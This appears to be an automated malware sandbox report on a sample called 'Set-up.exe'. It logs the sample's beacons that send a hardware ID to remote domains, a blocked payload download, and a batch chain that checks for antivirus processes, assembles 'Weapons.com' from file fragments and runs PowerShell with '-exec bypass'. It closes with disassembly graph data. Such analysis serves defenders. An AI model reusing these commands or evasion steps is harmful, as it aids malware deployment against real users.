                                                                  2024-12-20 17:17:51 UTC1098OUTData Raw: 2d 2d 59 45 30 44 49 50 49 53 4f 4d 56 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 31 45 34 41 33 34 30 41 35 32 37 43 41 31 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38 0d 0a 2d 2d 59 45 30 44 49 50 49 53 4f 4d 56 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 45 30 44 49 50 49 53 4f 4d 56 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 59 45 30 44 49 50 49 53 4f 4d 56 4b 57
                                                                  Data Ascii: --YE0DIPISOMVKWContent-Disposition: form-data; name="hwid"F61E4A340A527CA1312F742701D40858--YE0DIPISOMVKWContent-Disposition: form-data; name="pid"1--YE0DIPISOMVKWContent-Disposition: form-data; name="lid"hRjzG3--GAS--YE0DIPISOMVKW
                                                                  2024-12-20 17:17:52 UTC1132INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 17:17:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=63h2v67vb6hb66b2raf6852p21; expires=Tue, 15 Apr 2025 11:04:30 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xD7LViK5DJGTCaueGJN%2BBq%2BxYC6LHuOyYgogC7Bg3WZ7EcQTkL%2Bw5l0i7Ks6XmIIQAqLMd03sa%2BGjeYa8XHroAlsYPT2YeCFj6AN5zbJ%2BqCTBWwosIsiRU50E2A9FFj3k%2FwAbeW4"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f5149cc19d4426d-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1619&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2013&delivery_rate=1803582&cwnd=227&unsent_bytes=0&cid=31d06f087d033d8b&ts=834&x=0"
                                                                  2024-12-20 17:17:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-20 17:17:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449744172.67.202.2294431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:53 UTC268OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 112
                                                                  Host: chillysalvagk.click
                                                                  2024-12-20 17:17:53 UTC112OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 46 36 31 45 34 41 33 34 30 41 35 32 37 43 41 31 33 31 32 46 37 34 32 37 30 31 44 34 30 38 35 38
                                                                  Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=F61E4A340A527CA1312F742701D40858
                                                                  2024-12-20 17:17:54 UTC1132INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 17:17:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=qf98igmjqbkg00knrlntagsgbb; expires=Tue, 15 Apr 2025 11:04:32 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1PDW2PpSnqi%2BWjwB5GL9RunX3buZV8ckbNtQRsFQHv1s4Uzbt0%2F9ZxWy0fheB9d1l9qHsBC%2F7WANvUJYkI%2BQbqemsbhDNL%2BUu7VpV%2BgAbk5NiVfXGwCOQIHEL6MGWSgQGwNMOWvi"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f5149d9792e5e7c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1634&rtt_var=628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1016&delivery_rate=1787025&cwnd=196&unsent_bytes=0&cid=af36af4ddbb726b6&ts=798&x=0"
                                                                  2024-12-20 17:17:54 UTC138INData Raw: 38 34 0d 0a 76 2b 39 4e 59 70 70 59 79 6d 69 4a 6e 72 70 32 75 52 51 4d 6e 70 31 65 75 39 42 70 39 48 66 61 50 32 59 67 56 44 53 50 36 65 66 6b 6c 47 38 58 75 47 4c 6f 41 50 33 71 79 67 57 44 53 43 50 43 73 6a 58 58 75 52 6d 41 48 71 42 4f 53 46 4d 38 57 2f 2b 31 79 4e 61 42 4f 54 33 35 4e 4c 6f 33 35 66 72 49 4b 63 70 38 62 62 44 70 4a 73 2f 79 52 64 59 52 72 68 31 63 45 6e 67 57 36 73 76 64 6a 70 49 51 0d 0a
                                                                  Data Ascii: 84v+9NYppYymiJnrp2uRQMnp1eu9Bp9HfaP2YgVDSP6efklG8XuGLoAP3qygWDSCPCsjXXuRmAHqBOSFM8W/+1yNaBOT35NLo35frIKcp8bbDpJs/yRdYRrh1cEngW6svdjpIQ
                                                                  2024-12-20 17:17:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449745104.21.84.1134431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:55 UTC207OUTGET /int_clp_ldr_sha.txt HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Host: kliptizq.shop
                                                                  2024-12-20 17:17:56 UTC546INHTTP/1.1 403 Forbidden
                                                                  Date: Fri, 20 Dec 2024 17:17:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vba8yeLW9PyUA9TuWFHGnSs%2BaJMAVrEqsw4MYJigqAKCuf1bHWADw5m1uJZjJS4lEvDK4AEwcy3OHqBSnJl58M%2F1gOciWxucljWh7rBtcBAMuPPUiIu5js1jMVLIlhqH"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f5149e8ed01de92-EWR
                                                                  2024-12-20 17:17:56 UTC823INData Raw: 31 31 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                  Data Ascii: 11d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                  2024-12-20 17:17:56 UTC1369INData Raw: 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c
                                                                  Data Ascii: rors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-al
                                                                  2024-12-20 17:17:56 UTC1369INData Raw: 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69
                                                                  Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi
                                                                  2024-12-20 17:17:56 UTC1011INData Raw: 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50
                                                                  Data Ascii: class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>P
                                                                  2024-12-20 17:17:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:12:17:13
                                                                  Start date:20/12/2024
                                                                  Path:C:\Users\user\Desktop\Set-up.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                  Imagebase:0x400000
                                                                  File size:73'408'260 bytes
                                                                  MD5 hash:55688FD8190F43DB9F123F682BDD5181
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:12:17:14
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmd
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:12:17:14
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:12:17:17
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0x270000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:12:17:17
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                  Imagebase:0x280000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:12:17:17
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0x270000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:12:17:17
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                  Imagebase:0x280000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:12:17:18
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c md 405361
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:12:17:18
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /V "Supervisors" Relaxation
                                                                  Imagebase:0x280000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:12:17:19
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b ..\Singh + ..\Adaptation + ..\Pokemon + ..\Unified + ..\Failure + ..\Ups + ..\Related W
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:12:17:19
                                                                  Start date:20/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Weapons.com W
                                                                  Imagebase:0xad0000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:12:17:19
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:choice /d y /t 5
                                                                  Imagebase:0xcc0000
                                                                  File size:28'160 bytes
                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:12:17:55
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f5149e8ed01de92</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html>
                                                                  Imagebase:0xdf0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:16
                                                                  Start time:12:17:55
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:17.5%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:21%
                                                                    Total number of Nodes:1482
                                                                    Total number of Limit Nodes:25
                                                                    execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 